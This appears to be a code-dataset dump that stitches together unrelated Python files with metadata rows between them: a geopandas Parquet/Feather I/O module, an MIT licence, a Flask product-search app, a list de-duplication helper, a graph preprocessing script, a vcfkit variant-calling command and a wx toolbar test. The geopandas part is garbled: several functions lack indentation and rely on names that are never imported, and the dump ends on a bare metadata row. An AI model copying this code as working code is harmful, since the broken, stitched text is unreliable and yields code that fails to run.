from geopandas import GeoDataFrame
import geopandas
from .file import _expand_user
METADATA_VERSION = "0.1.0"
# reference: https://github.com/geopandas/geo-arrow-spec
# Metadata structure:
# {
# "geo": {
# "columns": {
# "<name>": {
# "crs": "<WKT or None: REQUIRED>",
# "encoding": "WKB"
# }
# },
# "creator": {
# "library": "geopandas",
# "version": "<geopandas.__version__>"
# }
# "primary_column": "<str: REQUIRED>",
# "schema_version": "<METADATA_VERSION>"
# }
# }
def _is_fsspec_url(url):
return (
isinstance(url, str)
and "://" in url
and not url.startswith(("http://", "https://"))
)
def _create_metadata(df):
    """Create and encode geo metadata dict.

    Parameters
    ----------
    df : GeoDataFrame

    Returns
    -------
    dict
    """
    # One metadata entry per geometry-typed column: CRS as WKT (or None),
    # the fixed WKB encoding marker, and the column's total bounds.
    column_metadata = {}
    for col in df.columns[df.dtypes == "geometry"]:
        series = df[col]
        crs_wkt = series.crs.to_wkt() if series.crs else None
        column_metadata[col] = {
            "crs": crs_wkt,
            "encoding": "WKB",
            "bbox": series.total_bounds.tolist(),
        }
    return {
        "primary_column": df._geometry_column_name,
        "columns": column_metadata,
        "schema_version": METADATA_VERSION,
        "creator": {"library": "geopandas", "version": geopandas.__version__},
    }
def _encode_metadata(metadata):
"""Encode metadata dict to UTF-8 JSON string
Parameters
----------
metadata : dict
Returns
-------
UTF-8 encoded JSON string
"""
return json.dumps(metadata).encode("utf-8")
def _decode_metadata(metadata_str):
"""Decode a UTF-8 encoded JSON string to dict
Parameters
----------
metadata_str : string (UTF-8 encoded)
Returns
-------
dict
"""
if metadata_str is None:
return None
return json.loads(metadata_str.decode("utf-8"))
def _validate_dataframe(df):
"""Validate that the GeoDataFrame conforms to requirements for writing
to Parquet format.
Raises `ValueError` if the GeoDataFrame is not valid.
copied from `pandas.io.parquet`
Parameters
----------
df : GeoDataFrame
"""
if not isinstance(df, DataFrame):
raise ValueError("Writing to Parquet/Feather only supports IO with DataFrames")
# must have value column names (strings only)
if df.columns.inferred_type not in {"string", "unicode", "empty"}:
raise ValueError("Writing to Parquet/Feather requires string column names")
# index level names must be strings
valid_names = all(
isinstance(name, str) for name in df.index.names if name is not None
)
if not valid_names:
raise ValueError("Index level names must be strings")
def _validate_metadata(metadata):
"""Validate geo metadata.
Must not be empty, and must contain the structure specified above.
Raises ValueError if metadata is not valid.
Parameters
----------
metadata : dict
"""
if not metadata:
raise ValueError("Missing or malformed geo metadata in Parquet/Feather file")
required_keys = ("primary_column", "columns")
for key in required_keys:
if metadata.get(key, None) is None:
raise ValueError(
"'geo' metadata in Parquet/Feather file is missing required key: "
"'{key}'".format(key=key)
)
if not isinstance(metadata["columns"], dict):
raise ValueError("'columns' in 'geo' metadata must be a dict")
# Validate that geometry columns have required metadata and values
required_col_keys = ("crs", "encoding")
for col, column_metadata in metadata["columns"].items():
for key in required_col_keys:
if key not in column_metadata:
raise ValueError(
"'geo' metadata in Parquet/Feather file is missing required key "
"'{key}' for column '{col}'".format(key=key, col=col)
)
if column_metadata["encoding"] != "WKB":
raise ValueError("Only WKB geometry encoding is supported")
def _geopandas_to_arrow(df, index=None):
    """Convert *df* to a pyarrow Table with 'geo' schema metadata.

    Shared implementation for to_parquet/to_feather: validates the
    frame, serializes geometry columns to WKB, and attaches the encoded
    geo metadata to the table schema.
    """
    from pyarrow import Table

    _validate_dataframe(df)

    # Capture the geo metadata (CRS, bounds, ...) before the geometry
    # columns are converted to plain WKB bytes.
    geo_metadata = _create_metadata(df)
    wkb_df = df.to_wkb()

    table = Table.from_pandas(wkb_df, preserve_index=index)

    # Attach the geopandas file-level metadata. This must be done AFTER
    # creating the table or it is not persisted.
    schema_metadata = table.schema.metadata
    schema_metadata.update({b"geo": _encode_metadata(geo_metadata)})
    return table.replace_schema_metadata(schema_metadata)
def _to_parquet(df, path, index=None, compression="snappy", **kwargs):
    """Write a GeoDataFrame to a Parquet file at *path*.

    Geometry columns are serialized as WKB and described by 'geo' schema
    metadata (tracking version 0.1.0 of the specification at
    https://github.com/geopandas/geo-arrow-spec). Requires 'pyarrow'.

    .. versionadded:: 0.8

    Parameters
    ----------
    path : str, path object
    index : bool, default None
        If ``True``, always write the index(es) as columns; if
        ``False``, never write them; if ``None``, write them except for
        a plain ``RangeIndex``, which is stored as metadata only.
    compression : {'snappy', 'gzip', 'brotli', None}, default 'snappy'
        Compression codec; use ``None`` for no compression.
    kwargs
        Forwarded to ``pyarrow.parquet.write_table()``.
    """
    parquet = import_optional_dependency(
        "pyarrow.parquet", extra="pyarrow is required for Parquet support."
    )

    arrow_table = _geopandas_to_arrow(df, index=index)
    parquet.write_table(
        arrow_table, _expand_user(path), compression=compression, **kwargs
    )
def _to_feather(df, path, index=None, compression=None, **kwargs):
    """Write a GeoDataFrame to a Feather file at *path*.

    Geometry columns are serialized as WKB and described by 'geo' schema
    metadata (tracking version 0.1.0 of the specification at
    https://github.com/geopandas/geo-arrow-spec).
    Requires 'pyarrow' >= 0.17.

    .. versionadded:: 0.8

    Parameters
    ----------
    path : str, path object
    index : bool, default None
        If ``True``, always write the index(es) as columns; if
        ``False``, never write them; if ``None``, write them except for
        a plain ``RangeIndex``, which is stored as metadata only.
    compression : {'zstd', 'lz4', 'uncompressed'}, optional
        Compression codec; ``"uncompressed"`` disables compression. By
        default uses LZ4 if available, otherwise uncompressed.
    kwargs
        Forwarded to ``pyarrow.feather.write_feather()``.
    """
    feather = import_optional_dependency(
        "pyarrow.feather", extra="pyarrow is required for Feather support."
    )
    # TODO move this version check into `import_optional_dependency`
    import pyarrow

    if Version(pyarrow.__version__) < Version("0.17.0"):
        raise ImportError("pyarrow >= 0.17 required for Feather support")

    arrow_table = _geopandas_to_arrow(df, index=index)
    feather.write_feather(
        arrow_table, _expand_user(path), compression=compression, **kwargs
    )
def _arrow_to_geopandas(table):
    """
    Helper function with main, shared logic for read_parquet/read_feather.

    Converts a pyarrow Table carrying 'geo' schema metadata into a
    GeoDataFrame, decoding the WKB geometry columns that were read.

    Raises ValueError when the 'geo' metadata is missing or malformed,
    or when none of the columns read is a geometry column.
    """
    df = table.to_pandas()
    metadata = table.schema.metadata
    if metadata is None or b"geo" not in metadata:
        raise ValueError(
            """Missing geo metadata in Parquet/Feather file.
            Use pandas.read_parquet/read_feather() instead."""
        )
    try:
        # Rebind `metadata` to the decoded 'geo' dict from here on.
        metadata = _decode_metadata(metadata.get(b"geo", b""))
    except (TypeError, json.decoder.JSONDecodeError):
        raise ValueError("Missing or malformed geo metadata in Parquet/Feather file")
    _validate_metadata(metadata)
    # Find all geometry columns that were read from the file. May
    # be a subset if 'columns' parameter is used.
    geometry_columns = df.columns.intersection(metadata["columns"])
    if not len(geometry_columns):
        raise ValueError(
            """No geometry columns are included in the columns read from
            the Parquet/Feather file. To read this file without geometry columns,
            use pandas.read_parquet/read_feather() instead."""
        )
    geometry = metadata["primary_column"]
    # Missing geometry likely indicates a subset of columns was read;
    # promote the first available geometry to the primary geometry.
    if len(geometry_columns) and geometry not in geometry_columns:
        geometry = geometry_columns[0]
    # if there are multiple non-primary geometry columns, raise a warning
    # NOTE(review): this warns whenever more than one geometry column was
    # read, even when the primary column itself is present and no
    # promotion happened — confirm whether that is intended.
    if len(geometry_columns) > 1:
        warnings.warn(
            "Multiple non-primary geometry columns read from Parquet/Feather "
            "file. The first column read was promoted to the primary geometry."
        )
    # Convert the WKB columns that are present back to geometry.
    for col in geometry_columns:
        df[col] = from_wkb(df[col].values, crs=metadata["columns"][col]["crs"])
    return GeoDataFrame(df, geometry=geometry)
def _get_filesystem_path(path, filesystem=None, storage_options=None):
    """
    Get the filesystem and path for a given filesystem and path.

    If ``filesystem`` is not None it is returned as is. Otherwise, for
    string paths, pyarrow's native filesystems are tried first
    (pyarrow >= 5.0), falling back to fsspec for URL-style paths.

    Raises
    ------
    ValueError
        If ``storage_options`` are given for a non-fsspec path.
    """
    import pyarrow

    if (
        isinstance(path, str)
        and storage_options is None
        and filesystem is None
        and Version(pyarrow.__version__) >= Version("5.0.0")
    ):
        # Use the native pyarrow filesystem if possible.
        try:
            from pyarrow.fs import FileSystem

            filesystem, path = FileSystem.from_uri(path)
        except Exception:
            # fallback to use get_handle / fsspec for filesystems
            # that pyarrow doesn't support
            pass

    if _is_fsspec_url(path) and filesystem is None:
        fsspec = import_optional_dependency(
            # Fixed typo in the user-facing error message ("requred").
            "fsspec", extra="fsspec is required for 'storage_options'."
        )
        filesystem, path = fsspec.core.url_to_fs(path, **(storage_options or {}))

    if filesystem is None and storage_options:
        raise ValueError(
            "Cannot provide 'storage_options' with non-fsspec path '{}'".format(path)
        )

    return filesystem, path
def _read_parquet(path, columns=None, storage_options=None, **kwargs):
    """
    Read a Parquet file into a GeoDataFrame.

    A subset of columns may be selected via ``columns``; the shape of the
    result depends on the selection:

    * if no geometry columns are read, a ``ValueError`` is raised — use
      the pandas `read_parquet` method instead;
    * if the file's primary geometry column is excluded, the first
      geometry column read becomes the active geometry of the returned
      GeoDataFrame.

    Requires 'pyarrow'.

    .. versionadded:: 0.8

    Parameters
    ----------
    path : str, path object
    columns : list-like of strings, default=None
        Columns to read from the file; all columns when None. See the
        notes above for how geometry-column selection is handled.
    storage_options : dict, optional
        Extra options for the storage connection (host, port, username,
        password, ...). For HTTP(S) URLs the key-value pairs are passed
        to urllib as header options; for other URLs (e.g. "s3://",
        "gcs://") they are forwarded to fsspec. When no storage options
        are provided and a filesystem is implemented by both
        ``pyarrow.fs`` and ``fsspec``, the ``pyarrow.fs`` implementation
        is preferred; pass an instantiated fsspec filesystem via the
        ``filesystem`` keyword to use fsspec instead.
    **kwargs
        Forwarded to ``pyarrow.parquet.read_table()``.

    Returns
    -------
    GeoDataFrame

    Examples
    --------
    >>> df = geopandas.read_parquet("data.parquet")  # doctest: +SKIP

    Specifying columns to read:

    >>> df = geopandas.read_parquet(
    ...     "data.parquet",
    ...     columns=["geometry", "pop_est"]
    ... )  # doctest: +SKIP
    """
    parquet = import_optional_dependency(
        "pyarrow.parquet", extra="pyarrow is required for Parquet support."
    )

    # TODO(https://github.com/pandas-dev/pandas/pull/41194): see if pandas
    # adds filesystem as a keyword and match that.
    fs = kwargs.pop("filesystem", None)
    fs, path = _get_filesystem_path(
        path, filesystem=fs, storage_options=storage_options
    )
    path = _expand_user(path)

    # Always request pandas metadata so the index round-trips.
    kwargs["use_pandas_metadata"] = True
    arrow_table = parquet.read_table(path, columns=columns, filesystem=fs, **kwargs)

    return _arrow_to_geopandas(arrow_table)
def _read_feather(path, columns=None, **kwargs):
    """
    Read a Feather file into a GeoDataFrame.

    A subset of columns may be selected via ``columns``; the shape of the
    result depends on the selection:

    * if no geometry columns are read, a ``ValueError`` is raised — use
      the pandas `read_feather` method instead;
    * if the file's primary geometry column is excluded, the first
      geometry column read becomes the active geometry of the returned
      GeoDataFrame.

    Requires 'pyarrow' >= 0.17.

    .. versionadded:: 0.8

    Parameters
    ----------
    path : str, path object
    columns : list-like of strings, default=None
        Columns to read from the file; all columns when None. See the
        notes above for how geometry-column selection is handled.
    **kwargs
        Forwarded to ``pyarrow.feather.read_table()``.

    Returns
    -------
    GeoDataFrame

    Examples
    --------
    >>> df = geopandas.read_feather("data.feather")  # doctest: +SKIP

    Specifying columns to read:

    >>> df = geopandas.read_feather(
    ...     "data.feather",
    ...     columns=["geometry", "pop_est"]
    ... )  # doctest: +SKIP
    """
    feather = import_optional_dependency(
        "pyarrow.feather", extra="pyarrow is required for Feather support."
    )
    # TODO move this version check into `import_optional_dependency`
    import pyarrow

    if Version(pyarrow.__version__) < Version("0.17.0"):
        raise ImportError("pyarrow >= 0.17 required for Feather support")

    arrow_table = feather.read_table(_expand_user(path), columns=columns, **kwargs)
    return _arrow_to_geopandas(arrow_table)
| 32.616466 | 87 | 0.653759 |
c36bd5026b34f96bfd247fabcebb9a1d670945e5 | 1,076 | py | Python | LICENSE.py | thismachinekillszombies/game_machine | 63e578ebb3e0d220e02f05f5e3c579c7d1cb1ae2 | [
"MIT"
] | null | null | null | LICENSE.py | thismachinekillszombies/game_machine | 63e578ebb3e0d220e02f05f5e3c579c7d1cb1ae2 | [
"MIT"
] | null | null | null | LICENSE.py | thismachinekillszombies/game_machine | 63e578ebb3e0d220e02f05f5e3c579c7d1cb1ae2 | [
"MIT"
] | null | null | null | MIT License
Copyright (c) 2018 Richard Butterworth
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
| 48.909091 | 78 | 0.806691 |
9e9699a6f1d4dddffcaa0df37784cb549f57cab3 | 4,862 | py | Python | run.py | andrew-dorrycott/inventory_search | 55a02d324188acd7f370010cec6254ff30b72cb1 | [
"Apache-2.0"
] | null | null | null | run.py | andrew-dorrycott/inventory_search | 55a02d324188acd7f370010cec6254ff30b72cb1 | [
"Apache-2.0"
] | null | null | null | run.py | andrew-dorrycott/inventory_search | 55a02d324188acd7f370010cec6254ff30b72cb1 | [
"Apache-2.0"
] | null | null | null | # Standard imports
import json
import logging
import logging.config
# Third party imports
import flask
import sqlalchemy
import yaml
# Application imports
from models.products import Product
LOGGER = logging.getLogger(__name__)
def load_config():
    """
    Load the application configuration from config.yaml.

    :returns: Parsed contents of config.yaml
    :rtype: dict
    """
    with open("config.yaml", "r") as config_file:
        return yaml.load(config_file, Loader=yaml.FullLoader)
def load_db(config):
    """
    Create a SQLAlchemy session to be used by the controllers.

    :param config: Configuration information provided by :meth:load_config
    :type config: dict
    :returns: SQLAlchemy Session
    :rtype: sqlalchemy.orm.session.Session
    """
    pg_config = config["postgresql"]
    engine = sqlalchemy.create_engine(
        pg_config["sqlalchemy_uri"].format(**pg_config)
    )
    session_factory = sqlalchemy.orm.sessionmaker(bind=engine)
    return session_factory()
def create_app():
    """
    Creates the base Flask application for running.

    Loads config, configures logging, opens a DB session, and registers
    the view/search controllers on the app.

    :returns: Flask app object
    :rtype: flask.Flask
    """
    app = flask.Flask(__name__, instance_relative_config=True)
    config = load_config()
    logging.config.dictConfig(config["logging"])
    LOGGER.debug("Logging config loaded")
    app.config.from_mapping(config)
    session = load_db(config)

    # Controllers (will be moved later)
    @app.route("/")
    def default():
        """
        Default controller if someone goes to the base host not knowing to go
        to view

        :returns: Text for the user
        :rtype: str
        """
        return "Psst, go to /view instead!"

    @app.route("/view")
    def view():
        """
        Page users can use to search from

        :returns: Rendered template
        :rtype: str
        """
        return flask.render_template("view.html")

    @app.route("/search/<token>")
    @app.route("/search/<field>/<token>")
    def search(token, field=None):
        """
        REST-like endpoint to do general searches or specified searches

        :param token: Full or partial words, integers, floats, or dates
        :type token: str
        :param field: Specific column searching through
        :type field: str
        :returns: Json with results and amount or Json with error message
        :rtype: json
        """
        # Search DB with the provided field and token
        query = session.query(Product)
        filters = None
        if field:
            column = getattr(Product, field)
            # BUG FIX: previously `LOGGER.debug(1, column)` passed the integer
            # 1 as the log format string, which raises when the record is
            # rendered. Use lazy %-style arguments instead.
            LOGGER.debug("Searching field %s (column %s)", field, column)
            # Numeric columns need exact matches; text columns get a
            # case-insensitive substring match.
            if isinstance(column.type, (sqlalchemy.Float, sqlalchemy.Integer)):
                filters = sqlalchemy.and_(getattr(Product, field) == token)
            else:
                filters = sqlalchemy.and_(
                    getattr(Product, field).ilike("%{}%".format(token))
                )
        else:
            # No field given: OR together a filter for every searchable column.
            for _, column in Product.__dict__.items():
                if not isinstance(
                    column, sqlalchemy.orm.attributes.InstrumentedAttribute
                ):
                    continue  # Not a column attribute
                if isinstance(
                    column.type, (sqlalchemy.String, sqlalchemy.VARCHAR)
                ):
                    new_filter = sqlalchemy.or_(
                        column.ilike("%{}%".format(token))
                    )
                    if filters is None:
                        filters = new_filter
                    else:
                        filters = filters | new_filter
                elif isinstance(
                    column.type, (sqlalchemy.Float, sqlalchemy.Integer)
                ):
                    if token.isdigit() is False:
                        continue  # Data won't work for this column
                    new_filter = sqlalchemy.or_(column == token)
                    if filters is None:
                        filters = new_filter
                    else:
                        filters = filters | new_filter
        try:
            results = query.filter(filters).all()
            return json.dumps(
                {
                    "results": [item.to_dict() for item in results],
                    "count": len(results),
                }
            )
        except sqlalchemy.exc.DataError:
            # e.g. non-numeric token against a numeric column.
            session.rollback()
            return json.dumps(
                {"error": "Invalid input for column `{}`".format(field)}
            )
        except Exception as error:
            session.rollback()
            LOGGER.exception(error)
            return json.dumps({"error": "Catastrophic error happened"})

    return app
if __name__ == "__main__":
    # Entry point when executed directly: build the Flask app and serve it
    # with the built-in development server.
    LOGGER.info("Application starting")
    app = create_app()
    app.run()
| 28.769231 | 79 | 0.548334 |
6c41327c644909888733e228df0c524bc2be1be2 | 242 | py | Python | tools/list_remove_duplicates.py | lucasayres/python-tools | 686b84986aae1b1714fa5645b1f2a3fd6ef8355d | [
"MIT"
] | 71 | 2018-06-28T17:38:15.000Z | 2022-02-08T17:42:42.000Z | tools/list_remove_duplicates.py | DalavanCloud/python-tools | 686b84986aae1b1714fa5645b1f2a3fd6ef8355d | [
"MIT"
] | null | null | null | tools/list_remove_duplicates.py | DalavanCloud/python-tools | 686b84986aae1b1714fa5645b1f2a3fd6ef8355d | [
"MIT"
] | 14 | 2018-07-08T03:29:29.000Z | 2022-03-22T21:04:39.000Z | # -*- coding: utf-8 -*-
def list_remove_duplicates(dup_list):
    """Remove duplicates from a list, preserving first-seen order.

    Args:
        dup_list (list): List of (hashable) values, possibly with duplicates.

    Returns:
        list: Unique values in the order they first appear in ``dup_list``.
    """
    # dict.fromkeys keeps insertion order, unlike the previous
    # list(set(...)) implementation whose output order was arbitrary
    # (and nondeterministic for e.g. strings across interpreter runs).
    return list(dict.fromkeys(dup_list))
376fe2c452eac359c1fab83544fd67398769c9d4 | 953 | py | Python | preprocess.py | DavidHeSkr/GCN-GAN-pytorch | f8adf82596733464cb63dddf978c244b25aebe46 | [
"MIT"
] | 66 | 2019-10-24T07:36:37.000Z | 2022-03-29T08:46:33.000Z | preprocess.py | DavidHeSkr/GCN-GAN-pytorch | f8adf82596733464cb63dddf978c244b25aebe46 | [
"MIT"
] | 2 | 2019-11-16T10:53:18.000Z | 2021-08-31T07:08:42.000Z | preprocess.py | DavidHeSkr/GCN-GAN-pytorch | f8adf82596733464cb63dddf978c244b25aebe46 | [
"MIT"
] | 24 | 2019-11-16T02:28:34.000Z | 2022-03-31T03:31:01.000Z | import yaml
import os
import numpy as np
from utils import get_snapshot
# load config
config = yaml.load(open('config.yml'))
# build path
base_path = os.path.join('./data/', config['dataset'])
raw_base_path = os.path.join(base_path, 'raw')
train_save_path = os.path.join(base_path, 'train.npy')
test_save_path = os.path.join(base_path, 'test.npy')
# load data
num = len(os.listdir(raw_base_path))
data = np.zeros(shape=(num, config['node_num'], config['node_num']), dtype=np.float32)
for i in range(num):
path = os.path.join(raw_base_path, 'edge_list_' + str(i) + '.txt')
data[i] = get_snapshot(path, config['node_num'], config['max_thres'])
total_num = num - config['window_size']
test_num = int(config['test_rate'] * total_num)
train_num = total_num - test_num
train_data = data[0: train_num + config['window_size']]
test_data = data[train_num: num]
# save data
np.save(train_save_path, train_data)
np.save(test_save_path, test_data) | 27.228571 | 86 | 0.721931 |
9742e94e5d93b43ec44377afbb605dbcfe64b559 | 5,849 | py | Python | vcfkit/call.py | AndersenLab/VCF-kit | a81a1a56790718c53a525c648995c98a416d3bfe | [
"MIT"
] | 86 | 2017-01-18T14:26:26.000Z | 2022-03-17T02:26:17.000Z | vcfkit/call.py | AndersenLab/vcf-toolbox | a81a1a56790718c53a525c648995c98a416d3bfe | [
"MIT"
] | 38 | 2016-10-30T18:52:30.000Z | 2022-03-12T15:15:35.000Z | vcfkit/call.py | AndersenLab/vcf-toolbox | a81a1a56790718c53a525c648995c98a416d3bfe | [
"MIT"
] | 22 | 2017-01-18T14:44:38.000Z | 2021-12-01T20:59:59.000Z | #!/usr/bin/env python
"""
usage:
vk call <seq> --ref=<reference> (--all-sites|--vcf-sites) <vcf>
options:
-h --help Show this screen.
--version Show version.
"""
import os
import sys
from collections import defaultdict
from signal import SIG_DFL, SIGPIPE, signal
from Bio import SeqIO
from Bio.Blast.Applications import NcbiblastxCommandline
from clint.textui import colored, indent, puts, puts_err
from docopt import docopt
from vcfkit.utils.blastn import blast, blast_variant
from vcfkit.utils.reference import resolve_reference_genome
from vcfkit.utils.vcf import *
from vcfkit import vk
signal(SIGPIPE, SIG_DFL)
def seq_type(filename):
    """
    Resolve the sequence file type (fasta/fastq/abi) from the filename
    extension, case-insensitively.

    :param filename: Path to the sequence file.
    :returns: One of 'fasta', 'fastq', 'abi' (Biopython format names).
    :raises ValueError: For an unrecognized extension.
    """
    _, ext = os.path.splitext(filename.lower())
    if ext in (".fasta", ".fa"):
        extension = 'fasta'
    elif ext in (".fastq", ".fq"):
        extension = 'fastq'
    elif ext in (".ab1", '.abi'):
        extension = 'abi'
    else:
        # BUG FIX: the old message reported only the lowercased splitext
        # root, dropping the extension — the very part that failed to match.
        raise ValueError("Unknown sequence file type: " + filename)
    with indent(4):
        puts_err(colored.green("\nReading sequences as %s\n" % extension.upper()))
    return extension
def resolve_sample_from_line(samples, line):
    """
    Resolve a sample name by splitting *line* on spaces/tabs and looking
    for exactly one known sample among the resulting tokens.

    :returns: The matched sample name, or "" when zero or several match.
    """
    tokens = re.split("[ \t]", line)
    matches = [sample for sample in samples if sample in tokens]
    return matches[0] if len(matches) == 1 else ""
def format_gt(gt):
    """
    Collapse a diploid genotype string (e.g. "A/A", "G|T") to its
    distinct alleles: homozygous calls become a single base, heterozygous
    calls are joined with "/".

    :param gt: Genotype string with alleles separated by '/' or '|'.
    :returns: Single allele, or '/'-joined distinct alleles.
    """
    # dict.fromkeys dedupes while preserving first-seen allele order;
    # the old list(set(...)) made het output order nondeterministic
    # ("G/T" vs "T/G" between runs).
    alleles = list(dict.fromkeys(re.split("[|/]", gt)))
    if len(alleles) == 1:
        return alleles[0]
    return '/'.join(alleles)
def format_args(args, add_missing_stdin = False):
    # NOTE(review): dead stub — never called in this module and its body is
    # a no-op (always returns None). Presumably intended to normalize docopt
    # args and inject stdin as <vcf> when missing; confirm before removing.
    if add_missing_stdin:
        pass # Test for vcf
def main(debug=None):
    """
    Entry point for `vk call`.

    BLASTs each input sequence against the reference genome and prints one
    tab-separated row per site. When a VCF is supplied, each site is also
    classified against the VCF call (TN/TP/FP/FN), treating the
    sequence-derived genotype as truth.

    :param debug: Optional argv list (used by tests) passed to docopt in
                  place of sys.argv.
    """
    args = docopt(__doc__,
                  version='VCF-Toolbox v0.1',
                  argv=debug,
                  options_first=False)
    module_path = os.path.split(os.path.realpath(__file__))[0]
    handle = open(args["<seq>"], "rb")
    reference = resolve_reference_genome(args["--ref"])
    if args["<vcf>"]:
        concordance = True
        v = vcf(args["<vcf>"])
        samples = v.samples
    if args["--vcf-sites"] and args["<vcf>"] is None:
        with indent(4):
            exit(puts_err(colored.red("\nMust specify <vcf> with --vcf-sites\n")))
    # Setup reference for blast call
    b = blast(reference)
    # Set file type:
    sequence_file_type = seq_type(args["<seq>"])
    # Output header
    print(("\t".join(blast_variant.output_order)))
    for record in SeqIO.parse(handle, sequence_file_type):
        # Resolve sample within fasta line; fall back to the record name.
        sample = resolve_sample_from_line(samples, handle.name)
        if not sample:
            sample = resolve_sample_from_line(samples, record.name)
        blast_results = b.blast_call(record)
        classification = ""
        for n, variant in enumerate(blast_results):
            output_line = False
            if variant is None:
                puts_err(colored.red("No Results for " + sample + " " + record.description))
                continue
            if args["<vcf>"]:
                if n == 0:
                    # First result only: collect this sample's VCF calls
                    # within the BLAST alignment region, reused for the
                    # remaining sites of this record.
                    vcf_variants = []
                    for vcf_variant in v(variant.region()):
                        if sample:
                            gt = format_gt(vcf_variant.gt_bases[v.samples.index(sample)])
                            vcf_variants.append([vcf_variant.CHROM,
                                                 vcf_variant.POS,
                                                 gt,
                                                 vcf_variant.REF,
                                                 vcf_variant.ALT])
                    vcf_variant_positions = [x[0:2] for x in vcf_variants]
                chrom_pos = variant.chrom_pos_allele()[0:2]
                vcf_variant_match = [x for x in vcf_variants if x[0:2] == chrom_pos]
                if vcf_variant_match:
                    vcf_variant_match = vcf_variant_match[0]
                    variant.vcf_gt = vcf_variant_match[2]
                    variant.REF = vcf_variant_match[3]
                    variant.ALT = ','.join(vcf_variant_match[4])
                    variant.fetch_variant_type()
                    # Concordance classification: seq_gt (sequencing) vs
                    # vcf_gt (VCF call), relative to the reference allele.
                    if variant.REF == variant.seq_gt and variant.seq_gt == variant.vcf_gt:
                        variant.classification = "TN"
                    elif variant.REF != variant.seq_gt and variant.seq_gt == variant.vcf_gt:
                        variant.classification = "TP"
                    elif variant.REF == variant.seq_gt and variant.seq_gt != variant.vcf_gt:
                        variant.classification = "FP"
                    elif variant.REF != variant.seq_gt and variant.seq_gt != variant.vcf_gt:
                        variant.classification = "FN"
                else:
                    # No VCF call at this position.
                    variant.REF = ""
                    variant.ALT = ""
                    variant.fetch_variant_type()
                    variant.classification = ""
                if args["--vcf-sites"] and variant.classification != "":
                    output_line = True
                elif args["--all-sites"] is True:
                    output_line = True
            else:
                # No VCF given: emit every site or only variant sites.
                if args["--all-sites"]:
                    output_line = True
                elif variant.is_variant:
                    output_line = True
            if output_line:
                variant.sample = sample
                if record.description:
                    variant.description = record.description
                else:
                    variant.description = os.path.split(handle.name)[1]
                print('\t'.join([str(variant)]))
main()
| 34.815476 | 92 | 0.542315 |
2282b12b3f0aefe044aa7c20c9c06f723033509e | 1,698 | py | Python | cpa/tests/test.py | DavidStirling/CellProfiler-Analyst | 7a0bfcb5cc7db067844595bdbb90f3132f9a8ea9 | [
"MIT"
] | 98 | 2015-02-05T18:22:04.000Z | 2022-03-29T12:06:48.000Z | cpa/tests/test.py | DavidStirling/CellProfiler-Analyst | 7a0bfcb5cc7db067844595bdbb90f3132f9a8ea9 | [
"MIT"
] | 268 | 2015-01-14T15:43:24.000Z | 2022-02-13T22:04:37.000Z | cpa/tests/test.py | DavidStirling/CellProfiler-Analyst | 7a0bfcb5cc7db067844595bdbb90f3132f9a8ea9 | [
"MIT"
] | 64 | 2015-06-30T22:26:03.000Z | 2022-03-11T01:06:13.000Z | import wx
from matplotlib.backends.backend_wxagg import FigureCanvasWxAgg, NavigationToolbar2WxAgg
from matplotlib.backends.backend_wx import _load_bitmap
import matplotlib as mpl
app = wx.App()
f = wx.Frame(None)
fig = mpl.figure.Figure()
p = FigureCanvasWxAgg(f, -1, fig)
toolbar = NavigationToolbar2WxAgg(p)
toolbar.Hide()
#toolbar constants
TBFLAGS = (wx.TB_HORIZONTAL|wx.TB_TEXT)
tsize = (24,24)
tb = f.CreateToolBar(TBFLAGS)
_NTB2_HOME = wx.NewId()
_NTB2_BACK = wx.NewId()
_NTB2_FORWARD = wx.NewId()
_NTB2_PAN = wx.NewId()
_NTB2_ZOOM = wx.NewId()
_NTB2_SAVE = wx.NewId()
_NTB2_SUBPLOT = wx.NewId()
tb.AddSimpleTool(_NTB2_HOME, _load_bitmap('home.png'), 'Home', 'Reset original view')
tb.AddSimpleTool(_NTB2_BACK, _load_bitmap('back.png'), 'Back', 'Back navigation view')
tb.AddSimpleTool(_NTB2_FORWARD, _load_bitmap('forward.png'), 'Forward', 'Forward navigation view')
tb.AddCheckTool(_NTB2_PAN, "", _load_bitmap('move.png'), shortHelp='Pan')
tb.AddCheckTool(_NTB2_ZOOM, "", _load_bitmap('zoom_to_rect.png'), shortHelp='Zoom')
tb.AddSeparator()
tb.AddSimpleTool(_NTB2_SUBPLOT, _load_bitmap('subplots.png'), 'Configure subplots', 'Configure subplot parameters')
tb.AddSimpleTool(_NTB2_SAVE, _load_bitmap('filesave.png'), 'Save', 'Save plot contents to file')
f.Bind(wx.EVT_TOOL, toolbar.home, id=_NTB2_HOME)
f.Bind(wx.EVT_TOOL, toolbar.forward, id=_NTB2_FORWARD)
f.Bind(wx.EVT_TOOL, toolbar.back, id=_NTB2_BACK)
f.Bind(wx.EVT_TOOL, toolbar.zoom, id=_NTB2_ZOOM)
f.Bind(wx.EVT_TOOL, toolbar.pan, id=_NTB2_PAN)
f.Bind(wx.EVT_TOOL, toolbar.configure_subplots, id=_NTB2_SUBPLOT)
f.Bind(wx.EVT_TOOL, toolbar.save_figure, id=_NTB2_SAVE)
tb.Realize()
f.Show()
f.Close()
app.MainLoop() | 33.96 | 115 | 0.765607 |
53183842dd44f3cb21817d7848fe772712524167 | 4,742 | py | Python | DLWP/barotropic/pyspharm_transforms.py | jweyn/DLWP | 3f32bfab98eacee2abe880d5bd214b6060627edd | [
"MIT"
] | 75 | 2019-05-02T15:31:49.000Z | 2022-03-29T07:00:49.000Z | DLWP/barotropic/pyspharm_transforms.py | flashlxy/DLWP | 0fddfa3ee927fa298648fc3eb469f5a7a93e51e9 | [
"MIT"
